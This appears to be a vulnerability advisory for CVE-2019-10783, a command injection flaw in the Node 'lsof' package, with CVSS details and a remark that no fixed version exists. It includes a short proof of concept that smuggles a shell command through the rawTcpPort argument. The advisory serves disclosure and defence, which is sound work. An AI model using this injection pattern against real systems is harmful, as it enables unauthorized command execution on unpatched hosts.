Do your applications use this vulnerable package?
Test your applications
Overview
lsof is a lsof processor for node.
Affected versions of this package are vulnerable to Command Injection. Multiple areas of the package is vulnerable to command injection. Every exported method used by the packages uses the exec
function to parse user input.
PoC by JHU System Security Lab
var root = require("lsof");
var attack_code = "& echo vulnerable > create.txt &";
root.rawTcpPort(attack_code, function(){});
Remediation
There is no fixed version for lsof
.
References
CVSS Score
7.5
high severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredNone
-
User InteractionNone
-
ScopeUnchanged
-
ConfidentialityHigh
-
IntegrityNone
-
AvailabilityNone
- Credit
- JHU System Security Lab
- CVE
- CVE-2019-10783
- CWE
- CWE-78
- Snyk ID
- SNYK-JS-LSOF-543632
- Disclosed
- 29 Jan, 2020
- Published
- 29 Jan, 2020